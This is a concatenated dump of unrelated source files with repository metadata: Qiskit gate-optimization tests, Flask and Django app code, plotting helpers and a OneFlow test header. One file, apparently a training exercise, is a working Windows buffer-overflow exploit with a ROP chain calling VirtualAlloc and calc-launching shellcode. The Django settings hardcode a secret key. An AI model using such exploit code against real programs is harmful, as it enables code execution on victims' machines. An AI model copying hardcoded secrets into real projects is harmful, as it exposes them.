"""U(pi/2, 0, pi/4) -> p(-pi/4)-sx-p(p/2). Basis [p, sx]."""
qr = QuantumRegister(2, "qr")
circuit = QuantumCircuit(qr)
circuit.append(UGate(np.pi / 2, 0, np.pi / 4), [qr[0]])
expected = QuantumCircuit(qr, global_phase=-np.pi / 4)
expected.append(PhaseGate(-np.pi / 4), [qr[0]])
expected.append(SXGate(), [qr[0]])
expected.append(PhaseGate(np.pi / 2), [qr[0]])
basis = ["p", "sx"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
msg = f"expected:\n{expected}\nresult:\n{result}"
self.assertEqual(expected, result, msg=msg)
def test_optimize_u3_to_u1(self):
"""U3(0, 0, pi/4) -> U1(pi/4). Basis [u1, u2, u3]."""
qr = QuantumRegister(2, "qr")
circuit = QuantumCircuit(qr)
circuit.append(U3Gate(0, 0, np.pi / 4), [qr[0]])
expected = QuantumCircuit(qr)
expected.append(U1Gate(np.pi / 4), [qr[0]])
basis = ["u1", "u2", "u3"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
msg = f"expected:\n{expected}\nresult:\n{result}"
self.assertEqual(expected, result, msg=msg)
def test_optimize_u3_to_u2(self):
"""U3(pi/2, 0, pi/4) -> U2(0, pi/4). Basis [u1, u2, u3]."""
qr = QuantumRegister(2, "qr")
circuit = QuantumCircuit(qr)
circuit.append(U3Gate(np.pi / 2, 0, np.pi / 4), [qr[0]])
expected = QuantumCircuit(qr)
expected.append(U2Gate(0, np.pi / 4), [qr[0]])
basis = ["u1", "u2", "u3"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual(expected, result)
msg = f"expected:\n{expected}\nresult:\n{result}"
self.assertEqual(expected, result, msg=msg)
def test_y_simplification_rz_sx_x(self):
"""Test that a y gate gets decomposed to x-zx with ibmq basis."""
qc = QuantumCircuit(1)
qc.y(0)
basis = ["id", "rz", "sx", "x", "cx"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(qc)
expected = QuantumCircuit(1)
expected.rz(-np.pi, 0)
expected.x(0)
msg = f"expected:\n{expected}\nresult:\n{result}"
self.assertEqual(expected, result, msg=msg)
def test_short_string(self):
"""Test that a shorter-than-universal string is still rewritten."""
qc = QuantumCircuit(1)
qc.h(0)
qc.ry(np.pi / 2, 0)
basis = ["sx", "rz"]
passmanager = PassManager()
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(qc)
expected = QuantumCircuit(1)
expected.sx(0)
expected.sx(0)
msg = f"expected:\n{expected}\nresult:\n{result}"
self.assertEqual(expected, result, msg=msg)
def test_u_rewrites_to_rz(self):
"""Test that a phase-like U-gate gets rewritten into an RZ gate."""
qc = QuantumCircuit(1)
qc.u(0, 0, np.pi / 6, 0)
basis = ["sx", "rz"]
passmanager = PassManager()
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(qc)
expected = QuantumCircuit(1, global_phase=np.pi / 12)
expected.rz(np.pi / 6, 0)
msg = f"expected:\n{expected}\nresult:\n{result}"
self.assertEqual(expected, result, msg=msg)
def test_u_rewrites_to_phase(self):
"""Test that a phase-like U-gate gets rewritten into an RZ gate."""
qc = QuantumCircuit(1)
qc.u(0, 0, np.pi / 6, 0)
basis = ["sx", "p"]
passmanager = PassManager()
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(qc)
expected = QuantumCircuit(1)
expected.p(np.pi / 6, 0)
msg = f"expected:\n{expected}\nresult:\n{result}"
self.assertEqual(expected, result, msg=msg)
if __name__ == "__main__":
unittest.main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
b74fd5349fcc910ed9dcad8717e15620b73eb4be
|
c516df2118000e3abaa61527de7badb94680081e
|
/utilities/common.py
|
b3a2eae746c77898ae21aed1623a0194a141bbd9
|
[
"MIT"
] |
permissive
|
xod442/paw
|
82c8d54af052edaea05ed36a0846fe9722f047f3
|
f55df04dd7af7a1b25844c809187a99cfb24b813
|
refs/heads/main
| 2023-04-16T12:19:50.849945
| 2021-04-26T20:06:51
| 2021-04-26T20:06:51
| 360,992,530
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,345
|
py
|
import time
import boto3
from flask import current_app
import datetime
import arrow
import bleach
def utc_now_ts():
return int(time.time())
def utc_now_ts_ms():
return lambda: int(round(time.time() * 1000))
def ms_stamp_humanize(ts):
ts = datetime.datetime.fromtimestamp(ts/1000.0)
return arrow.get(ts).humanize()
def linkify(text):
text = bleach.clean(text, tags=[], attributes={}, styles=[], strip=True)
return bleach.linkify(text)
def email(to_email, subject, body_html, body_text):
# don't run this if we're running a test or setting is False
if current_app.config.get('TESTING') or not current_app.config.get('AWS_SEND_MAIL'):
return False
client = boto3.client('ses')
return client.send_email(
Source='webmaster@rickkauffman.com',
Destination={
'ToAddresses': [
to_email,
]
},
Message={
'Subject': {
'Data': subject,
'Charset': 'UTF-8'
},
'Body': {
'Text': {
'Data': body_text,
'Charset': 'UTF-8'
},
'Html': {
'Data': body_html,
'Charset': 'UTF-8'
},
}
}
)
|
[
"rick@rickkauffman.com"
] |
rick@rickkauffman.com
|
7b6b378236a2bc362d4690f63b090adb2c04b502
|
ee2bf52e37e23ea3030da212beb484319a35ed80
|
/2015-2016 Nivel Basico/13_ejercicio13/ejer13.py
|
0b89a0858602cd945032f63ee17fb4405c586e74
|
[] |
no_license
|
Trietptm-on-Coding-Algorithms/CLS-Exploits
|
318fde8c3817fc6cf7e81ddf392f5eeac1f5c898
|
94ea56cf51fcd89330c0d93e62d5f3d905e5e602
|
refs/heads/master
| 2020-03-20T19:15:58.696676
| 2016-08-28T11:02:32
| 2016-08-28T11:02:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,286
|
py
|
import struct,subprocess, win32api
p = lambda x : struct.pack("<I", x)
shellcode = "\x66\x81\xE4\xFC\xFF\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52"
shellcode += "\x56\x64\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E"
shellcode += "\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C"
shellcode += "\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45\x75\xF5\x0F"
shellcode += "\xB7\x54\x51\xFE\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7\x90"
''' shellcode
.code
start:
and sp,0xfffc
xor edx,edx
push edx
push 0x636c6163
mov esi,esp
push edx
push esi
mov esi,DWORD PTR fs:[edx+0x30]
mov esi,DWORD PTR [esi+0xc]
mov esi,DWORD PTR [esi+0xc]
lods eax,DWORD PTR ds:[esi]
mov esi,DWORD PTR [eax]
mov edi,DWORD PTR [esi+0x18]
mov ebx,DWORD PTR [edi+0x3c]
mov ebx,DWORD PTR [edi+ebx*1+0x78]
mov esi,DWORD PTR [edi+ebx*1+0x20]
add esi,edi
mov ecx,DWORD PTR [edi+ebx*1+0x24]
add ecx,edi
iter:
inc edx
lods eax,DWORD PTR ds:[esi]
cmp DWORD PTR [edi+eax*1],0x456e6957
jne iter
movzx edx,WORD PTR [ecx+edx*2-0x2]
mov esi,DWORD PTR [edi+ebx*1+0x1c]
add esi,edi
add edi,DWORD PTR [esi+edx*4]
call edi
nop
'''
payload = "\xff" + p(0x45464748) + p(0xdeadbeef) + p(0xff) # bypassing checks
payload += p(0x1010179b) # pop esi <---------------------=
payload += p(0x10103000+0x74) # virtualloc + 74h |
payload += p(0x10101b00) # jump [esi + 74h] |
payload += p(0x1010103a) # | ret |
payload += p(0x0012af80) # | addr |
payload += p(0x00001000) # | size |
payload += p(0x00001000) # | allocation type |
payload += p(0x00000040) # |- Protection |
payload += p(0x0012af8a) # jmp to nop sled ----------------------= |
payload += p(0x10103000) # virtualAlloc to be poped in shellcode | |
payload += p(0xdeadbeef) * 10 # nop sled <------------------------------= |
payload += p(0x10101CA3) # pop pop pop ret |
payload += p(0x10101039) # stack pivot pop ret -----------------------=
payload += p(0x90909090) * 7
payload += shellcode
fDat = open('fichero.dat', 'wb')
fDat.write(payload)
subprocess.Popen(['ejercicio13.exe'])
|
[
"kalianon2816@gmail.com"
] |
kalianon2816@gmail.com
|
0d45e78b19f4d813d68e96f4df32cedd410ce71d
|
8a80bb000cda51cc3e6d2057455dd36e665ee236
|
/django_server/scale/settings.py
|
2ccccd04c674f8bf73a55d0d82092bfd3eda50ef
|
[] |
no_license
|
johncohn/SmartAmericaServer
|
16dbef7d8643294abbb8c5314f71c351adfb65b1
|
98f0d719340fd8e33ff55166d227da280f4efd3b
|
refs/heads/master
| 2021-01-21T17:53:52.419511
| 2014-05-15T01:21:58
| 2014-05-15T01:21:58
| 19,803,308
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,268
|
py
|
import os, yaml
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('Kyle Benson', 'kyle.edward.benson@gmail.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'test_db', # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': 'vagrant',
'PASSWORD': '',
'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
# extract necessary information from environment to run our services on BlueMix
env = os.environ
try:
for k,v in yaml.load(env['VCAP_SERVICES']).items():
if k.startswith('postgresql'):
creds = v[0]['credentials']
DATABASES['default']['HOST'] = creds['host']
DATABASES['default']['PORT'] = creds['port']
DATABASES['default']['USER'] = creds['user']
DATABASES['default']['PASSWORD'] = creds['password']
DATABASES['default']['NAME'] = creds['name']
if k.startswith('user-provided'):
for info in v:
if info['name'] == 'Twilio':
TWILIO_ACCOUNT_SID = info['credentials']['accountSID']
TWILIO_AUTH_TOKEN = info['credentials']['authToken']
except KeyError: #not on BlueMix
pass
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Los_Angeles'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = '/var/www/app/static/'
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'vw7__ve*_3j^edw+@9k9(24_efqjnul-k=84yis*ew$xstr&*!'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'scale.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'scale.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
'django_twilio',
'django_extensions',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
[
"kyle.edward.benson@gmail.com"
] |
kyle.edward.benson@gmail.com
|
60e077f3f23f697b0b33bdeca4b24594f3478247
|
626b14ce13986b6d5e03143e151004247659625a
|
/Day01-15/code/Day08/student.py
|
7d753978b63ee1f015b2f6a12f70198e93ff89bc
|
[] |
no_license
|
Focavn/Python-100-Days
|
c7586ecf7ae3f1fd42f024558bb998be23ee9df8
|
d8de6307aeff9fe31fd752bd7725b9cc3fbc084b
|
refs/heads/master
| 2021-08-08T17:57:02.025178
| 2020-09-17T11:58:04
| 2020-09-17T11:58:04
| 220,427,144
| 0
| 0
| null | 2019-11-08T08:59:43
| 2019-11-08T08:59:41
| null |
UTF-8
|
Python
| false
| false
| 1,108
|
py
|
"""
定义和使用学生类
Version: 0.1
Author: 骆昊
Date: 2018-03-08
"""
def _foo():
print('test')
class Student(object):
# __init__是一个特殊方法用于在创建对象时进行初始化操作
# 通过这个方法我们可以为学生对象绑定name和age两个属性
def __init__(self, name, age):
self.name = name
self.age = age
def study(self, course_name):
print('%s正在学习%s.' % (self.name, course_name))
# PEP 8要求标识符的名字用全小写多个单词用下划线连接
# 但是很多程序员和公司更倾向于使用驼峰命名法(驼峰标识)
def watch_av(self):
if self.age < 18:
print('%s只能观看《熊出没》.' % self.name)
else:
print('%s正在观看岛国大电影.' % self.name)
def main():
stu1 = Student('骆昊', 38)
stu1.study('Python程序设计')
stu1.watch_av()
stu2 = Student('王大锤', 15)
stu2.study('思想品德')
stu2.watch_av()
if __name__ == '__main__':
main()
|
[
"Focavn@users.github.com"
] |
Focavn@users.github.com
|
431602925b46ace497c918040418d87142253df9
|
f87dab371a20e6144935e549b7e87aed36623e9c
|
/data/reinforcement_learning/utility_function_7_with_state_probs/base_scripts/plotting_functions.py
|
985cbfe884ec2f87f232556b81482a39af860176
|
[
"MIT"
] |
permissive
|
MichalisPanayides/AmbulanceDecisionGame
|
7d6aa1a61932671c288550335c192e40fcf7da9f
|
1fbf7a8321395e2908fa6b1f537b3d1e5f1bb979
|
refs/heads/master
| 2023-04-17T19:14:53.229221
| 2022-12-20T15:43:12
| 2022-12-20T15:43:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,083
|
py
|
"""Plotting functions"""
import csv
import itertools
import numpy as np
import matplotlib.pyplot as plt
import ambulance_game as abg
def team_expertise_priority(srv, ind): # pylint: disable=unused-argument
"""
Servers priority based on expertise
"""
if srv.id_number == 1:
return 0
if srv.id_number == 4:
return 1
return np.random.random()
def get_filepath(parameters, e_parameter):
"""
Get the filepath for the output file.
"""
key_params = [
"lambda_1",
"lambda_2",
"num_of_servers",
"threshold",
"system_capacity",
"buffer_capacity",
]
filename_parameters = {key: parameters[key] for key in key_params}
filepath = (
"base_scripts/results/e="
+ str(e_parameter)
+ ","
+ str(filename_parameters)
.replace(" ", "")
.replace("'", "")
.replace(":", "=")
.replace("{", "")
.replace("}", "")
+ ",mu="
+ str(parameters["mu"])
)
return filepath
def read_utilities_from_file(filename):
"""
Read the utilities from the file.
"""
my_list = []
with open(filename, "r", encoding="utf8") as file:
reader = csv.reader(file)
for row in reader:
my_list.append([float(i[1:-1]) for i in row])
return my_list
def read_rates_from_file(filename):
"""
Read the rates from the file. Note that this function is specific to 4 servers
"""
server_1_rates = []
server_2_rates = []
server_3_rates = []
server_4_rates = []
with open(filename, "r", encoding="utf8") as file:
reader = csv.reader(file)
for row in reader:
num_of_states = len(row) / 4
if int(num_of_states) == num_of_states:
num_of_states = int(num_of_states)
else:
raise Exception("Number of states is not an integer")
server_1_rates.append(
[
float(i.replace("[", "").replace("]", ""))
for i in row[:num_of_states]
]
)
server_2_rates.append(
[
float(i.replace("[", "").replace("]", ""))
for i in row[num_of_states : (2 * num_of_states)]
]
)
server_3_rates.append(
[
float(i.replace("[", "").replace("]", ""))
for i in row[(2 * num_of_states) : (3 * num_of_states)]
]
)
server_4_rates.append(
[
float(i.replace("[", "").replace("]", ""))
for i in row[(3 * num_of_states) :]
]
)
return server_1_rates, server_2_rates, server_3_rates, server_4_rates
def read_states_from_file(filename):
"""
Read the states from the file
"""
state_probs = []
with open(filename, "r", encoding="utf8") as file:
reader = csv.reader(file)
for row in reader:
state_probs.append(
[float(i.replace("[", "").replace("]", "")) for i in row]
)
return state_probs
def reconstruct_rates(rates_from_file, system_capacity, buffer_capacity, threshold):
"""
Reconstruct rates dictionary where it will be of the form:
rates = dict{
iteration : dict{
server_id: dict{
state: rate
}
}
}
I changed main.py after the first two experiments and the results are now
saved in two different ways. That's why I needed to ude the two if
statements. The two if statements are:
- If num_of_states == len(all_states) means that there is one entry for
every valid rate for each server
- Elif num_of_states == (system_capacity + 1) * (buffer_capacity + 1) means
that there is one entry for all possible combinations of (u,v)
where some are not valid
e.g. T=3, N=4, M=2 => state (1,1) does not exist in the first case
while it is on the second (stupid Mike)
"""
num_of_servers = len(rates_from_file)
num_of_iterations = len(rates_from_file[0])
num_of_states = len(rates_from_file[0][0])
all_states = abg.markov.build_states(
threshold=threshold,
system_capacity=system_capacity,
buffer_capacity=buffer_capacity,
)
if num_of_states == len(all_states):
rates = {}
for iteration in range(num_of_iterations):
rates[iteration] = {}
for server_id in range(1, num_of_servers + 1):
rates[iteration][server_id] = {}
for index, (u, v) in enumerate(sorted(all_states)):
# if v >= threshold or u == 0:
rates[iteration][server_id][(u, v)] = rates_from_file[
server_id - 1
][iteration][index]
elif num_of_states == (system_capacity + 1) * (buffer_capacity + 1):
rates = {}
for iteration in range(num_of_iterations):
rates[iteration] = {}
for server_id in range(1, num_of_servers + 1):
rates[iteration][server_id] = {}
for index, (u, v) in enumerate(
itertools.product(
range(buffer_capacity + 1), range(system_capacity + 1)
)
):
if v >= threshold or u == 0:
rates[iteration][server_id][(u, v)] = rates_from_file[
server_id - 1
][iteration][index]
else:
raise Exception("Dunno what you on about mate")
return rates
def reconstruct_rates_matrix_from_dictionary(
rates_dict, system_capacity, buffer_capacity
):
"""
Reconstruct rates matrix from dictionary.
"""
rates_array = np.empty((buffer_capacity + 1, system_capacity + 1)) * np.nan
for (u, v), rate in rates_dict.items():
rates_array[(u, v)] = rate
return rates_array
def reconstruct_state_probabilities(states_from_file, system_capacity, buffer_capacity):
"""
Reconstruct state probabilities dictionary where it will be of the form:
state_probs = dict{
iteration : dict{
state: probability
}
}
}
"""
num_of_iterations = len(states_from_file)
num_of_states = len(states_from_file[0])
if num_of_states == (system_capacity + 1) * (buffer_capacity + 1):
state_probs = {}
for iteration in range(num_of_iterations):
state_probs[iteration] = (
np.zeros((buffer_capacity + 1, system_capacity + 1)) * np.NaN
)
for index, (u, v) in enumerate(
itertools.product(
range(buffer_capacity + 1), range(system_capacity + 1)
)
):
current_state_prob = states_from_file[iteration][index]
if not np.isnan(current_state_prob):
state_probs[iteration][u, v] = current_state_prob
else:
raise Exception("Invalid number of states")
return state_probs
def get_plots(utilities, all_rates, all_state_probs, num_of_servers):
"""
Plot the utilities and the weighte mean rates of all servers over all
iterations.
Weighted rate = Rate at state (u,v) * Probability of state (u,v)
"""
_, (ax1, ax2) = plt.subplots(1, 2, figsize=(20, 7))
for srv in range(num_of_servers):
ax1.plot([util[srv] for util in utilities])
for srv in range(1, num_of_servers + 1):
server_mean_weighted_rates = []
for itr, _ in enumerate(all_rates):
current_iteration_mean_weighted_rate = 0
for state, current_rate in all_rates[itr][srv].items():
current_state_prob = all_state_probs[itr][state]
if not np.isnan(current_state_prob) and state != (0, 0):
current_iteration_mean_weighted_rate += (
current_rate * current_state_prob
)
server_mean_weighted_rates.append(current_iteration_mean_weighted_rate)
ax2.plot(server_mean_weighted_rates)
ax1.legend([f"Server {srv}" for srv in range(1, num_of_servers + 1)])
ax1.set_title("Utilities of all servers over all iterations")
ax2.legend([f"Server {srv}" for srv in range(1, num_of_servers + 1)])
ax2.set_title("Weighted mean rates of all servers over all iterations")
def get_utilities_rates_and_state_probs(
filepath, threshold, system_capacity, buffer_capacity
):
"""
Construct the utilities, rates and state probabilities from file.
"""
utilities = read_utilities_from_file(filepath + "/utilities.csv")
raw_rates = read_rates_from_file(filepath + "/rates.csv")
raw_state_probs = read_states_from_file(filepath + "/state_probs.csv")
reconstructed_rates = reconstruct_rates(
raw_rates,
system_capacity=system_capacity,
buffer_capacity=buffer_capacity,
threshold=threshold,
)
reconstructed_state_probs = reconstruct_state_probabilities(
states_from_file=raw_state_probs,
system_capacity=system_capacity,
buffer_capacity=buffer_capacity,
)
return utilities, reconstructed_rates, reconstructed_state_probs
def plot_utilities_and_weighted_rates(
filepath, num_of_servers, threshold, system_capacity, buffer_capacity
):
"""
Calculate the utilities, rates and state probabilities from file and plot
them.
"""
utils, rates, state_probs = get_utilities_rates_and_state_probs(
filepath=filepath,
threshold=threshold,
system_capacity=system_capacity,
buffer_capacity=buffer_capacity,
)
get_plots(
utilities=utils,
all_rates=rates,
all_state_probs=state_probs,
num_of_servers=num_of_servers,
)
|
[
"noreply@github.com"
] |
noreply@github.com
|
0b684c99ea79b5699e5e6d3ae3e126bcb13269bb
|
cd829aa60c3716b7509d028437b78f953e86da34
|
/myapp.py
|
3596b6c79bd649d94b224f84cf94ca4373faf036
|
[] |
no_license
|
raghavkgarg/pytutorial
|
fc893e7945c137e94a3aeef085ec175530434476
|
5971bd3b5cb4f5a459b17d02ea59830f167f2c75
|
refs/heads/master
| 2020-07-08T11:03:31.793145
| 2016-08-23T18:20:26
| 2016-08-23T18:20:26
| 66,391,869
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,122
|
py
|
import numpy as np
from bokeh.models import Button
from bokeh.palettes import RdYlBu3
from bokeh.plotting import figure, curdoc, vplot
# create a plot and style its properties
p = figure(x_range=(0, 100), y_range=(0, 100), toolbar_location=None)
p.border_fill_color = 'black'
p.background_fill_color = 'black'
p.outline_line_color = None
p.grid.grid_line_color = None
# add a text renderer to out plot (no data yet)
r = p.text(x=[], y=[], text=[], text_color=[], text_font_size="20pt",
text_baseline="middle", text_align="center")
i = 0
ds = r.data_source
# create a callback that will add a number in a random location
def callback():
global i
ds.data['x'].append(np.random.random()*70 + 15)
ds.data['y'].append(np.random.random()*70 + 15)
ds.data['text_color'].append(RdYlBu3[i%3])
ds.data['text'].append(str(i))
ds.trigger('data', ds.data, ds.data)
i = i + 1
# add a button widget and configure with the call back
button = Button(label="Press Me")
button.on_click(callback)
# put the button and plot in a layout and add to the document
curdoc().add_root(vplot(button, p))
|
[
"raghav.garg21@gmail.com"
] |
raghav.garg21@gmail.com
|
af132b52a2a42c7eb350dd3fad4e62461d23f6d3
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03548/s330099741.py
|
473abd697eb7a23e0c786ec6a00b442861d84293
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 118
|
py
|
#!/usr/bin/python
# -*- Coding: utf-8 -*-
x, y, z = (int(i) for i in input().split())
n = int((x-z)/(y+z))
print(n)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
ceab0fc7fa5ef71ff7b8ddb2c812ea071ed34b3a
|
3d468777900a94f5ed2acd859b5c8fb3961072fa
|
/imtools.py
|
e99ee1460753e4a6d48b35c2c71f195ac559dbe4
|
[] |
no_license
|
lgguzman/CVisionexample
|
ae7b571524648bb9dd3045df1fa73eef9338c906
|
c64b7c95afd035f51125c94708ee429ec2b86a60
|
refs/heads/master
| 2020-03-08T21:08:21.817328
| 2018-04-06T13:49:53
| 2018-04-06T13:49:53
| 128,400,291
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,160
|
py
|
import os
from numpy import *
from scipy.ndimage import filters
def get_imlist(path):
return [os.path.join(path, f) for f in os.listdir(path) if f.endswith('.jpg') or f.endswith('.jpeg')]
def histeq(im, nbr_bins =256):
imhist, bins = histogram(im.flatten(), nbr_bins, normed=True)
cdf = imhist.cumsum()
cdf = 255 * cdf / cdf[-1]
im2 = interp(im.flatten(), bins[:-1], cdf)
return im2.reshape(im.shape), cdf
def sobel_filter_ix(im):
imx = zeros(im.shape)
filters.sobel(im, 1, imx)
return imx
def sobel_filter_iy(im):
imy = zeros(im.shape)
filters.sobel(im, 0, imy)
return imy
def sobel_filter_magnitud(im):
return sqrt(sobel_filter_ix(im)**2+sobel_filter_iy(im)**2)
def gaussian_filter_ix(im, sigma = 5):
imx = zeros(im.shape)
filters.gaussian_filter(im,(sigma, sigma), (0, 1), imx)
return imx
def gaussian_filter_iy(im, sigma = 5):
imy = zeros(im.shape)
filters.gaussian_filter(im, (sigma, sigma), (1, 0), imy)
return imy
def gaussian_filter_magnitud(im , sigma = 5):
return sqrt(gaussian_filter_ix(im, sigma)**2,
gaussian_filter_iy(im, sigma)**2)
|
[
"ing.luis.guzman.reyes@gmail.com"
] |
ing.luis.guzman.reyes@gmail.com
|
20a9aad0196588ee85844a524186b9c74f485d9b
|
63862669b6b428ef23e2733e50b47ef7a11ceb60
|
/basic info/varia.py
|
ce978e8d87db873269e2593e3bcd2404f720095d
|
[] |
no_license
|
CyborgVillager/Learning_py_info
|
961fde2cdba7ec0b7e1aacd437aeba99083cd192
|
a1504ab4610f88ae2de738a49ac6513c3358a177
|
refs/heads/master
| 2020-11-25T22:17:33.966387
| 2020-02-11T04:34:29
| 2020-02-11T04:34:29
| 228,869,781
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 620
|
py
|
#variables
def story_example():
name = "John"
age = 25
para0 = "Lorem ipsum dolor sit amet, consectetur adipiscing elit. In interdum, odio et feugiat auctor, ante leo t" \
"incidunt tortor, sed lacinia leo augue vel lorem. In rutrum est libero"
para1 = "Nunc euismod magna in diam finibus sollicitudin. Aliquam commodo tortor lorem, in tincidunt quam dapibus " \
"fringilla. Duis vitae sem ut ligula efficitur varius."
print(name, 'is age', str(age), para0, '\n', name, para1)
def story_start():
story_example()
story_start()
|
[
"almawijonathan@gmail.com"
] |
almawijonathan@gmail.com
|
1fe26b687dbd81149de336083512b6e7129e88d1
|
2eb779146daa0ba6b71344ecfeaeaec56200e890
|
/python/oneflow/compatible/single_client/test/ops/test_transpose.py
|
02117e32289d49fe2caa7a1e4f230115958caf6e
|
[
"Apache-2.0"
] |
permissive
|
hxfxjun/oneflow
|
ee226676cb86f3d36710c79cb66c2b049c46589b
|
2427c20f05543543026ac9a4020e479b9ec0aeb8
|
refs/heads/master
| 2023-08-17T19:30:59.791766
| 2021-10-09T06:58:33
| 2021-10-09T06:58:33
| 414,906,649
| 0
| 0
|
Apache-2.0
| 2021-10-09T06:15:30
| 2021-10-08T08:29:45
|
C++
|
UTF-8
|
Python
| false
| false
| 4,027
|
py
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import unittest
from collections import OrderedDict
import numpy as np
import tensorflow as tf
import test_global_storage
from test_util import GenArgList
import oneflow.compatible.single_client.unittest
from oneflow.compatible import single_client as flow
